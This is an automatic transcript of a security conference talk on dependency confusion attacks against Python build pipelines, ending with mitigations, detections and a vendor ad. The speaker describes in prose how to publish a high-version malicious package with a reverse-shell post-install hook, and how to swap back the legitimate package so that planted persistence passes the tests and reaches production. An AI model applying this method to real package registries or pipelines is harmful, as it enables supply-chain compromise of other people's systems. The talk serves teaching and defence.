
I think we're ready to go so my slide says good morning everyone because I didn't update my notes so this is still all my notes from my previous talk so I won't be using them otherwise we'll definitely have confusion today so good afternoon everyone um welcome to my talk today um I would like to touch on a vulnerability called dependency confusion um my name is tennis um I do research consultancy things um it's been a while in the C the security field and just honestly enjoying it so that being said I think let's dive directly into it so um you might be confused because we're going to talk about devops today not actually raate teaming but in the
end we'll tie it back again to to raate teaming itself there as well um I think it's worth sort of having a conversation around how development has changed over the last couple of years um some of you might remember words like the waterfall model and then all of the buzzwords that followed after that like scrum master and agile and moving blockers and I don't know it's a it's a wild field out there but the key point that I want to focus on is that I think in today's time we have moved over to a lot of automation right um in the past it was a manual process you would develop code you would test code yourself right and
then afterwards you would go through the various stages of deploying it into different environments testing again and once you're happy again a manual process that you're following to migrate that over and in today's time a lot of that if not all of it is automated for us right we have basically what you can call a cicd pipeline or a devops pipeline and now the new buzzwords are things like Dev SEC Ops to care about security of the pipeline and in the pipeline and all of those different things but the key that I want to focus on is that automation element and what that changes for me is that no longer is the end result the only thing that
Freight actors can Target right because there's automation introduced because at this point it's not just about compromising a developer but compromising any of the technologies that are being used in that pipeline is actually going to allow you to get to that aim to get into production where it might have been um in the past just a vulnerability that you had to exploit right so the attack surface has grown significantly now for today we will be using the following pipeline as a demonstration I know it's not fully complete I only have one environment with production right so I'm cheating a little bit by going directly to production but bear with me um for this pipeline that we will be using today we
have a developer they're using a workstation there is a VPN that they use to connect in and essentially in this case what we are saying for security is that this developer only has access to gitlab right they should only have access to the source code from their automation takes over and we're hoping that the security of the automation is going to deal with it for us um I'm also using a gitlab runner there's a bunch of other things that you can use um GitHub has GitHub actions for example um I like gitlab because um you can host it on Prem um and do some interesting stuff with it and then basically what is happening is we will be um basically
talking about two different packages one of them is a um python package so a python library that we are using that we're storing on a locally hosted piie repo and then or or registry and then we have a Docker image that gets built and that's basically a flask application that we are going to host into production there as well um and as you can see from the CI configuration we are basically going to talk about four different stages so we have the prepare uh the board the deploy and then the test stage that's going to execute today so let's quickly take a look at what that um is actually doing um that website for any of you that attended
Ethan's talk he is to blame he set up this network and decided that the best application he can come up with is one that's actually doing translation between my messages and his there as well so what we are going to do here is we'll see that we have the different stages for prepare we're basically going to kill that Docker container bold we're going to actually compile the code and then we're going to deploy it and then we're going to run some tests and those tests are important for us because with the test cases we need to make sure that the code is actually working right so what I'm going to do is I'm going to add
some more gen z words there for translation so um just following through with what he gave me there so we'll do a little bit of a translation we'll do a commit and then once we do a commit that gitlab Runner is going to pick it up and it's going to execute that CI script for us there so if we quickly take a look there we will see that the new one is running and we'll see that the four stages themselves are in action there so that one should complete quite quickly just stopping that container so that we can do a rebuild there and then just give git lab a a little bit of a time um
and there we go we can see that it's starting to do its build basically what that process is doing is it's creating a new docket image and that docket image is compiling the flask application but it's also before that step it is going to install the actual dependencies that are required for that flask application and one of those dependencies and that is what we're going to focus on today is a pip package that it needs to pull from that internal piie registry and we can see very importantly that the test case actually succeeded that's the important part there it's worth noting in today's time even your unit tests are automated as well right and if your unit tests
don't succeed then immediately the rest of the pipeline is basically going to stop I know I'm misspelled surprise it was very early in the morning but we can see that the translation works the app is working it's recompiled and basically we are in the new environment there so taking this into consideration um basically we have to ask the questions of how would we go and approach to attack this I talked about a larger attack surface what does that actually look like so if we're not looking for vulnerabilities in the actual application what are we looking to compromise that now there are quite a lot of research that's done about this specific thing um I would say that
there's four main elements that you can look at you can for example inject into the source itself right maybe you're lucky and basically uh you're making a pull request as a contributor sneaking in a little bit of um vulnerable code there that goes undetected and now all of a sudden you've injected into the source code and your malicious code it's going to make its way all the way through I don't know who of you for example followed along with the um lines. sh one that would be the other one commit as a maintainer he's just a friendly guy looking to get some stats right and all of the sudden if you're using lines. sh um you're now sending um
what might be client or confidential data off to some random server um basically um for someone to collect that information so not a great idea you can inject into the repo system itself can you compromise credentials can you get tokens for it all of those wonderful things looking to exploit vulnerabilities in any of those software Stacks as well so again it's not just about vulnerabilities in production but if there's a vulnerability on gitlab if there's a vulnerability on Jenkins on anything that is being used in that pipeline you might have the opportunity to again inject into that attack surface there's also injection during the Bold but most of that is around compromising the Bold system itself and you'll see
when we touch on dependency confusion this is a little bit of a different vulnerability there or we can look to create a new package there are things like um I want to call it package squatting like typo squatting um and if you read sort of some of the Articles out there it happens a lot all of us have fat fingers when we're typing a pin store or something and if you make one mistake like npy becomes npie all of a sudden someone has registered that package and it's a malicious package and it's going to execute and the reason this is so important is because remember your B pipeline is essentially code execution at that point right it's
actual code execution that is happening there it has a lot of privileges it's intended that way right the answer is not to make the installer less privileged or to reduce functionality because it needs that right it's actually installing a package for you at that point but we are not going to look at any of these what we are going to look at is a vulnerability called dependency confusion now this was originally published in 2021 um show of hands any of you know of this vulnerability heard of it before okay so we have a couple of people here that has heard of it when Alex found it for the first time um he was able to compromise
Apple Microsoft Tesla and PayPal at the same time he racked in $120,000 in bug Bounties in one go so quite a powerful one um out there Apple didn't want to give him the maximum one he was like dead sure you could actually compromise everyone's Apple device and they were like no you're stretching a bit um but I personally believe him when he says that as well and essentially this dependency confusion vulnerability stems from the issue that your package managers when you are performing an install right they are getting the packages from multiple different locations right so it's not coming from a single location it's coming from multiple dis locations and then essentially the package manager
needs to decide which one to install right and this specific vulnerability comes from internal and external dependencies now there's a lot of debates whether a package is a internal package or an external package for today what we will be focusing on for this distinction is did you develop this dependency yourself and are you self-hosting it or is this a dependency that someone else has developed and they are hosting it if you think about something like jQuery that's going to be an external dependency right you did not write jQuery I hope the the offer of jQuery is not here right but you might be using that package but let's say for your business for example you have a
package that you are using for authentication right you want to standardize the process of authentication you're going to create a um a library or a dependency to deal with that authentication once right and then you're going to self-host that package because now it's going to be nice and fun whenever there's a new project that you're developing you can use that exact same package in those cases so how does dependency confusion works well it's about winning the race right and as you'll see here the race that we are talking about is a race of version numbers so let's say we have the following environment where we have production and then you'll notice that we have two different python or pipie
Registries right we have the external one which is py. or and then we have the internal one of py. loock that's a registry that we are self-hosting with our own packages that we are creating so what's going to happen is that the attacker needs to learn the name of the internal package or internal dependency and we'll touch on the various different ways in which you can learn that name some of it is super simple some of it might be a little bit harder but I want to make it clear the attacker doesn't need the actual package they don't need the source code of the package they only need to know the name of the package in
question so after they learn the name of the package what they are going to do is basically upload the same package name to the external pipo repo right with a higher version number that's where the trick comes in right we upload it with a higher version number I always choose version 9,000 so I haven't seen a lot of software that reached that version before and then essentially what's going to happen is your bold infrastructure at the point where it needs to run that install it's going to collect the packages from multiple locations and it's going to see huh I have the same package being hosted internally and externally so which one am I going to
install and the decision comes down to the higher version number right on most of these things like pip gems npm it's choosing the higher version number to install in that case and all of the sudden what's going to happen right is the Bold will occur with the package the package version that's a higher number which is the attacker control package right so without knowing the source code without knowing anything but the name of the internal package I now have the ability to essentially get code execution at the Bold stage right and then essentially using some very nice techniques um we have the ability to essentially take that malicious package and infect the pipeline moving further
and that's the part that we're also going to focus on on a little bit today so before we touch on just showcasing the the the basic pipeline of this let's sort of look at how you're able to learn a package name stack Overflow is my favorite right um so you'll see here that basically we have someone asking a question um and divulging a little bit of information about their specific packages right and here we can see that we learned the name of their um internal package which is the genz trans lator and what's nice about this and this is for the further attack we also want to learn a little bit of information about the internal Pipi registry itself as
well you can either learn that externally or there are techniques to enumerate that when you infect with dep pendency confusion there as well and then where we can see that um the issue comes in is with the PPP in stall and we'll touch on that for the mitigations as well what they are doing is they are saying extra index URL so what that is saying is rather than forcibly download from one location at another potential location where this package can be downloaded from right so now we know the name and we also know where the internal repo is going to be stored there as well um there are other ways that you can find it so before this talk I basically
ran a search for-- extra- index URL um not a lot of repos only 18 but about 64,000 issues So reading through those finding a couple of package names finding a couple of vendors or um sort of places that are using packages you'll definitely be able to find a couple there um it's also worth noting when um Alex found this one first um with his search he was actually able to um infect net all of its versions um which is why um Microsoft also paid him out the bug Bounty there as well um and you can actually still see if you go to that commit you can see that that actually fixed it to change it from extra index
URL to index URL so they were properly vulnerable and I mean if you were able to infect Nate um that's a couple of people um that's in for a bad time um and then very important we're focusing for this talk on python packages but as I mentioned this can happen for um Ruby so with your gems and um with JavaScript with mpm it can happen there as well um and what Alex also found there as well is that a lot of the times when you do a npm compile um in the JS files that gets generated sometimes it actually discloses um the names of internal packages that are being used and that's another way that you can go about when
you enumerate a web application to actually learn those package names there as well so how are we actually going to do remote code execution for that we need to talk about what do you need to create an actual python package right and we're going to keep it B simple basically if you want to create a python package you need a setup. config file you need a setup.py file and then you basically need the package and you don't need a main but I think you're a Savage if you don't have a main so you need a init file and you need a main file that's it that's a bare metal the simplest package that you can have and
what we are going to do for remote code execution is essentially in setup.py we are basically going to make use of What's called the post inst scripts you have pre-install po install pre-developed um what these hooks basically do is they are hooks meant for you to execute additional commands after a certain step in the package installation so one that um any of you that do offensive security might know if you look at the impacket tools right after you do the install miraculously from terminal you can just call the file right you don't need to go to the location where they're installed and then use files that's a PO install hook right basically what it's doing is it's
doing a rebind of where the packages were installed to a um bin which means that you can essentially use them so there's legitimate reasons for having these hooks but we can use these same hooks because python is also um code execution as a feature you can import OS and from that point you can do whatever you want so we are going to inject into that specific section of the post install for us to get code execution so let's quickly take a look at what that looks like so you'll see that here we are basically going to create our package so we'll start with a config file very simple just a little bit of meta data about where to find stuff it's
just going to pull that config file in there as well and then what we'll do is we will create two files so the first one is our init file um and we're not doing any code execution or anything here we're just simply creating two basic files I'm also going to populate main um but this isn't a requirement for the package to actually install both of those can simply be empty files there as well um and then it's just going to be a little bit of painful because none of my um you're going to see none of my tools were actually set up at this point so I'm quickly going to have to install twine and also um s this for my installs
there as well but what you'll see is we're currently doing the Imports we're going to set our version number to 90001 because I'm pretty sure 9,000 is going to win the race and then we're basically going to copy over our package name there as well and then let's start with a little bit of code so we'll do our post install and for this one we're just going to go with a python reverse shell I think it's going to be an ugly reverse shell you can see there in the command class we're just specifying for install to hook into the post install there as well um and for this one we'll just do a simple python reverse shell um that is going to
get executed I know this is wild because I'm running osot system in Python to run python again to run import OS to then again run a a shell for me there but it works okay so we're going to do that then we're going to try to compile we're going to fail miserably um afterwards and then we'll quickly get the right and relevant stuff uh sorry that did not mean to happen uh hold on there we go I just need my mouse I'm going to skip forward there okay there we go skip a bit forward Okay cool so basically what we are going to do there oh on that note when you run the python DM build it's going to build both a tar
file and a wheel file for you you can't actually get code execution with a wheel file um the first thing that I had to learn is if you want code execution basically what you're going to do is just delete the wheel file and only upload the tar file then anyone that gets your package is actually going to get code executed so it is really that simple okay so now let's quickly go um after sort of creating the package we uploaded it to piie we're going to add another genz word just to Showcase that the pipeline itself is going to execute can't remember all the words I added that is sus cool okay and let's go let's have the
pipeline execute let's give it a little bit of
time okay prepare should be done by the time we go into it and then essentially at the Bold stage what is going to happen is that at the Bild stage where it goes pip install with the extra index URL at this point it's going to find that package both on p.org and on the internal repo as well um and what you will see there is that we have a nice shell um but it is no I don't clap because the shell doesn't work right um it is absolutely horrendous right um and this is part of the problem right because basically I got a shell yay the question is where where did I get a shell number one that's where the
confusion part of this entire talk comes in right it's red teaming but you don't know who you're compromising so I don't know if you fully can can go this route right but it's worth noting as well I hope that all of you noticed is that essentially we were at a stand right that entire bold process did not continue at the point that I have a shell now that's my bad I need to create a nonblocking shell and everything like that to at least have the code still execute right um but it's great we got that to work and we can see and then all of the sudden we fail test anyone have an idea why we fail that
test there we go we don't have the source code right because we don't have the source code of the original package right at the point where the unit test execute at the point where it runs the import for the package nothing happens right we will 100% fail every single one of those unit tests right and this is where I personally believe dependency confusion died a slow death right why everyone was like great story bro but um not going to happen not going to care about it not really going to do anything about it because in essence we will know 100% at the point where dependency confusion is happening because the Bold stage will freak out um at most if
you're able to compromise something like a developer workstation which is great but right at that point where they try to run the code which is the next step after compilation right um essentially they will figure out that something is wrong so that is the issue for it right we can see that the test case the unit test has essentially not executed right and in this case we got remote code execution in a Docker agent that's currently running a board like it it doesn't really help at that point right it's going to meet immediately be um detected and the best we can essentially hope for is going to be for a compromise of a workstation so this was about 4
years ago when I played around with the vulnerability and I found a better way right so four years ago I found a way that you can actually get past the entire bold stage and you have a way to essentially blast through two production don't want to publish it because I didn't feel that it's ethical that that information is one 100% out there it felt a little bit iffy so I decided to basically just leave it so if you go look at for example some of the training that I did on um dependency Management on trackme you'll see that's where it stops right shows you how to get remote code execution on a Docker container I
feel like that's it we can leave it there um but it's always been bugging me because there are actually ways that you can get fully through to production or they were let me make that very clear they were and then there were some trouble um this week but basically we have a post install hook right um and we are in the exact location where a pip in store is running right so why don't we actually use this right so this led me down a a path four years ago where I essentially investigated how does pip actually install packages and how does pip determine whether a package is actually installed right you just see succeeded or failed right that's not
always just determined by like errors or things that go out there like what actually tells pip that a package has successfully installed so what we're going to do is we're actually going to do a couple more steps and essentially what we are going to do here is that we need to find the location of What's called the egg file so pip until recently I need to keep saying that caveat basically what they did is they would essentially look for a egg file the egg file would be placed in the directory where it installed the package and that egg file upon exit from pip it would read that one and if that file a exists and if it has the right um
information in it it would say cool package has successfully installed right and we move on our merry way we have a pip exit that succeeds so what I basically um Fury crafted and created is what if we a save the location of where that egg file is right when it's in installing our package remember this is po install right so we save the egg info um location and then we run pip again to uninstall ourselves right so let's uninstall our malicious version and then let's actually fix the code that they made a mistake in so rather than using extra index URL let's use index URL so we force it to use the internal Reaper right and then once it's actually
installed the correct version the only thing that remains for for us is to take the correct versions egg file and replace it in the location where pip is actually looking for our malicious installs egg file right and there you go all of the sudden we're solving a couple of problems here firstly pip is not going to error out because it's essentially going to um find um the install has succeeded and now also we solve that massive problem of not having access to the source code right at this point if this has executed what is going to happen is that we will have actually installed the legitimate package the unit test cases are going to run all of
them are going to succeed and if you're not like me writing an os. system Command right but actually sneaky with your persistance you have the ability to embed persistence and wait until this package that is compiled makes its way to production and at that point you execute and you have code execution on production and if you ask me um I would love to see the faces of an incident response team that has to deal with that like where do you start right like where's your logs to tell you that production is infected all of the sudden with a persistence mechanism like how do you trace that back to the actual build stage in in those cases and what's worth
noting here is we're also leveraging something and that will become important we know for a fact for something to be a p package the one file it always has to have the init file right so you embed your persistence in the init file right and only Savages right in the init file so you are 99.99% secure that the actual package won't have code in the inet file right it shouldn't it should be an empty file every tutorial you read tells you it's an empty file but it executes as soon as you import the package so that now means we embedded persistence in an init file so we're not overwriting um any of the sensitive code and at the point where
they run import package our remote code execution is going to execute so this worked for four years and then Monday morning 1:00 none of my pipelines work that one past is where I reverted back to just normal stuff I got failed failed failed failed failed failed failed and I didn't understand why right so I promise you this exploit worked for me I'm now standing like Shilling like snake all here because it worked for me for the last four years and now all of the sudden a we before my demo python decided no not going to happen every single one of my pipelines was failing and I actually had to do a little bit of investigation and it turns out python
doesn't use egg files anymore at all so the entire principle of my compromise was gone right because now essentially what python is doing and more so importantly Pip with the later versions of it is that essentially it's no longer using the egg file it's no longer Distributing the egg file to the install location instead what it is going to do is it's going to build it in a temporary location right and then use that egg file to compile a disc um which is that disc info that you can see there as well but they were not done screwing me over the other part that they also screwed me over on is post install is no longer
post install um you can do some funky stuff with Freds and you can get very very close but they actually learned that it's bad that the actual package gets fully deployed and then post install executes so what they are doing now is essentially post inall is the very very very last step before the wheel gets compiled and the wheel gets dropped right so you physically can't do Post install anymore right like you did in the past it will always after your post install that's the step where it's going to run the compile step and then it's going to do the deploy that so that's an issue because remember our entire path to get to production relied
on the fact that we can uninstall ourselves that we don't need that code anymore and we can replace it with a legitimate version so it was not good um I had to decide what we are going to do for today um and essentially I was this close to contacting Charles and saying like I'm out I think you need to find someone to to do a talk in last week um this was about 2:00 in the morning and I said well let's try we did it once we can find it again right so let's go back to the basics of what is actually happening here right so now as I mentioned post install is going to
execute before the compile and deployed so you can see that after copy is me doing a print right in the post install phas after the install has run and you'll see only after that is it building the wheel creating the wheel and then deploying it so you physically can't and trust me pyth does not like Freds and I gave it so many Freds to try and get past that point you physically can't get past that point right the last steps that pup is going to execute is compiling that wheel and then deploying it for you right but it's worth noting we are still in the position where PPP is used so we can still do this right we
just have to be a little bit smarter so essentially we're going to change a couple of things right the first thing that we're going to do is that immediately now we are going to install the correct package why cuz remember it hasn't yet compiled our wheel the package doesn't yet exist right so when you run pipin stall in a pipin stall right it's actually going to install so this is going to install the correct version of the package and deploy it okay that's great but remember it's going to compile our package and it's going to overwrite that version and we don't want that so what we are going to do is we're going to determine where
it's actually running that install that Alis say Al I know it's bad OBS that was sanity in like 3 4:00 in the morning right but what we are going to do is essentially we will embed the persistence in that package so we're still going for in the in it file of remember this is the legitimate package I know we're all confused myself as well right let's keep this together okay this is the legitimate package we are embedding persistence in the legitimate package our malicious package has not yet installed we with it cool okay great then we keep a backup okay that's very important keep a backup of the legitimate package because remember we're going to overwrite it right so
essentially we keep a backup of the legitimate package and then this is where the second part comes in in our malicious package we are now going to be a Savage and actually execute code and in it so what we do remember it's now going to compile our malicious package and then essentially is going to override the legitimate package again with the malicious package but now in our malicious package what we are going to do is we are again going to find a location of where we're installed we're going to run pip uninstalled now so it's very interesting when your package is loaded into memory right that's the point where you can actually uninstall it it doesn't need the files anymore
it's not like a Windows system that locks the file once P has run it in memory it's perfectly fine so we're going to uninstall ourselves we are going to flush that directory into to Oblivion and the reason we need to do that is because pip is not actually going to do a full replacement of the legitimate package it is only going to overwrite files that match in the original one and our malicious one and remember we're keeping things minimal we only have an init file so technically the normal package is already there and we've only overwritten the init file but for good OBS we actually want to remove ourselves right so we blast it and then
we take the backup that we kept and essentially we take that backup and we put it in the location where it's expecting it and now we're done we basically have the legitimate package in the right place so the unit tests are going to work and we have embedded persistence crazy let's watch it cool okay so essentially just to Showcase it again we basically have our install where we are fixing the code for them so instead of extra index. URL we are using index. URL that forces it to install from the internal location and then what we're going to do is we are going to embed into the actual one and notice the little Ampersand I learned my mistake
non-blocking right we want that child to execute but the rest of it to still run and then as mentioned we are going to keep a safe backup of that code and then worth noting just again in our init file what we are going to do find our location uninstall ourselves nuk the directory and then copy the backup to the legitimate location that we needed to be in in there as well so all of that being said let's actually now this is like 4 5:00 in the morning um let's actually add another word you can see I even deleted sus I was reverting code as much as possible to try and get this back um so let's add another another
jenz word and then let's actually see that we blast all the way into production um I don't know don't ask me this is for e to understand me do not ask me why these are the words that they are um okay so let's look at our pipeline you can see all of my miserable fails before that there as well um and let's see what it's going to do so the prepare stage is going to run then let's look at the Bold stage what's going to run here as well okay here we go should install our package now let's go get our shell um now worth noting here we're passing the Bold stage without getting a shell right
which is expected because it should it should do the right things um as soon as the package executes for the first time so there we can see that essentially the entire bold step has succeeded let's quickly make sure that the steps are there and you can notice there that it says that it installed version 932 a lot of versions um but you can notice that it actually installed 0.1.3 which is the actual package um so let's then see the test stage we can see that the test passed so this means that our entire pipeline succeeded and this time we have a shell and one that's worthy so finally finally we actually have a sh in production and just to show that the
um actual application is working as intended um and it is doing what it should lots of Sanity loss but we we finally got there as well with everything working okay now on this note just a couple of things that I want to to finish on here as well the reason I believe this is quite a potent attack for you to perform out there as well is that there's not a lot of information given to someone that this is happening you saw the Bold stage completed as normal and you saw that one line that it basically mentioned that a different package was installed and then the correct version package was installed as well it's worth also noting that I was
running pip in theose mode which I don't think a lot of people do right if you don't run it in the Bose mode you lose even more of the opsc there it's not even going to tell you that it found two versions it's just going to blast through and it's going to do its install okay now it's worth noting that the same vulnerability for dependency confusion is something that you can find in both James um for Ruby and then also in MPN as well and this is part of the rest of the exploration that I want to go on there as well um for npm you have things like pre-installs installs and po installs so different places where you
can inject and again in a lot of those cases right that race condition is going to happen of the higher version numbers right most package managers are configured to use multiple different sources where it's put its packages because you have both internal and external packages in the mix right and if you can create this confusion the higher version number is going to win there as well so what can we do for mitigations um also if you were at Ethan talk you'll notice the difference between mitigations and remediations right um and that is because I don't really think there is a fullblown remediation for dependency confusion um because everything you're going to do is going to have something else for you to
think about and something to do apart from the last one which I think is a a pretty decent one but essentially the first thing we can do is we can basically lock the the repos or the Registries right so we can split out our list and say these are the installs for internal dependencies right these are the list of external dependencies and run them as separate steps where you pointing it directly to a specific um registry where it needs to pull the package from um I think it can work but that's been one of my biggest gripes with the entire fight between index URL and extra index URL like I can fundamentally understand why you would
want to just add another another registry and not necessarily lock it down to one single registry right if you just look at how anything works it has multiple locations right because one location can fail so it makes sense for me why certain people want to do something like an Xtra index URL um one of the things you can do and this is a Surefire way to fight against this is version pinning right so in your packages you can pin them to a version and there are a lot of people that do this my personal issue with that is is it becomes outdated right as soon as you version pin you're going to version pin into Oblivion which then means if there
is a actual vulnerability in the package you will not receive that update there as well right but if you version pin you are telling pip it needs to look for this exact version there as well the other thing you can do is in certain cases with the package managers you can tell it to change its priority this is not something you can directly do for example in PIP but if you're using something like jrog artifactory or Azure devop you can actually tell it what is the priority of searching for for packages there as well but then you need to basically rechange the priority to be that it's not version number based but sort of the priority of which registry
it's going to hit first and then the other thing that we are seeing and I personally believe that this is one of the best remediations that you can do there is if you have internal dependencies register the package name externally there as well claim that space right and what works really really well with something like npm is you can register the name of MWR and then all of your packages can be MWR do this package MWR do this because you own the name MWR no one can essentially register a package that starts with MWR dot so you own that entire top um name space for all packages in that location so that's something that you can do but then again
you need to make sure that all your developers are actually keeping to that convention and using that Nam space for their packages there as well and then just lastly to to end off on what are the detections for this and what can we do here um I think you can hunt for the vulnerable installs like I showed you-- extra index URL is one of the things that shows it whenever gems has a source or npn has A- s in the command attach you know that they're adding additional Registries there and you need to do some sanity checking there as well and then the other thing that I realized um looking at it and looking at the logs
that I have in my actual build output is that those pipeline logs are crucial and I hope that we can go to a stage where you can do stuff like a p install verose as ugly as that is and as much information it generates but that that log files of our build stages actually plays a a large role right and it's not just enough to have logging in production we need to have logging that goes through that entire pipeline there as well and keeps that information for us and this is not just for dependency confusion but for other pipeline attacks out there as well right um as soon as there's an attack that happens of that
actual pipeline um your production logs are not going to be the place to try and piece together what has actually happened there and then just lastly um thanks for Alex for for the initial research um inspired me to look for this inspired me to to take it further and um yeah just thanks for for try Haack me they're sponsoring my AWS bill which if any of you have AWS you know it's expensive so that definitely helps there um thank you very much any
questions yes
yeah um I mean I played around with that a lot when Pip started doing things differently so I was doing a super of a super of a super to try and get it past that compile stage I just I I physically couldn't but I think there's there's that for me is an interesting part but a more interesting one that I would like to actually do is exfiltration of the source code of that internal package because at the point where you have the source code you can hunt for more vulnerabilities and even if they fix dependency confusion um at that point you actually sit with that source code which might be intellectual property at at best and at worst has um some
vulnerabilities that you can exploit there as well um but yeah I I felt very dirty writing code in init.py um it should not be there but it does work so yes any other
questions probably the one that it hit first and I need to I need to to check how it depends on that order but like I said just version 9,000 that's taking you to the Moon any other questions thank you very [Applause] much across the attack surface scattered products and siloed views create blind spots that feel Unstoppable the deadliest risks are in these gaps where attackers move inin it's time to unify fragmented snapshots into one allseeing view of risk and unleash a platform born with one intention isolate and eradicate your priority exposures from it infrastructure to Cloud environments to critical infrastructure and everywhere in between this is tenable your exposure ends here